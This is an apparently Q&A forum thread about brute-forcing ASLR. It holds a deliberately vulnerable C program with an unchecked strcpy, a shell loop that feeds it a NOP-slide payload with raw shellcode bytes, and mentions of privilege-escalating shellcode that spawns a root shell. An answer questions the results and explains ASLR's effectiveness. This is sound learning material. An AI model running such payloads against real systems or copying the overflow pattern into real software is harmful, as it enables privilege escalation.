# ASLR brute force

Tags: c, buffer-overflow, aslr

I just read about Address Space Layout Randomization and I tried a *very* simple script to try to brute force it. Here is the program I used to test a few things.

```
#include <stdio.h>
#include <string.h>

int main (int argc, char **argv)
{
    char buf[8];
    printf("&buf = %p\n", buf);
    if (argc > 1 && strcpy(buf, argv[1]));
    return 0;
}
```

I compiled it with this command:

```
gcc -g -fno-stack-protector -o vul vul.c
```

I made sure ASLR was enabled:

```
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
```

Then, I came up with this simple script:

```
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
    . "\x90"x65536                        \
    . "\x31\xc0\x40\x89\xc3\xcd\x80"'`

while [ $? -ne 1 ]; do
    ./vul $str
done
```

The format is

```
return address many times | 64KB NOP slide | shellcode that runs exit(1)
```

After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.

I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?

**EDIT**: I did some additional research and here is what I found:

- I asked a friend to run this code using `-m32 -z execstack` on his 64b computer and after changing the return address a bit, he had the same results.
- Even though I did not use `-z execstack`, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well know scenario `chown root ./vul`, `chmod +s ./vul`, shellcode that runs `setreuid(0, 0)` then `execv("/bin/sh", ...)` and finally `whoami` that returns 'root' in the spawned shell).
  That is quite strange since `execstack -q ./vul` tels me the executable stack flag bit is not set. Does anyone have an idea why?

Answer (score 1):

First of all, I'm a bit surprised that you do not need to pass the option `-z execstack` to the compiler to get the shellcode to execute the `exit(1)`.

Moreover, I guess you are on a 32bits machine as you did not pass the option `-m32` to `gcc` in order to get 32bits code.

Finally, I did run your program without success (I waited way more than a few seconds).

So, I'm a bit doubtful about your conclusion (except if you are running a very peculiar Linux system or may have been lucky).

Anyway, there are two main things that you have not mentionned:

1. Having a bug that offer an unlimited exploitation windows is quite rare.
2. Most of the modern systems run on amd64 (64bits) processors, which lower drastically the probability to hit the nop-zone.

You may take a look at the section "[ASLR Effectiveness](http://en.wikipedia.org/wiki/Address_space_layout_randomization#Effectiveness)" on the ASLR's Wikipedia page.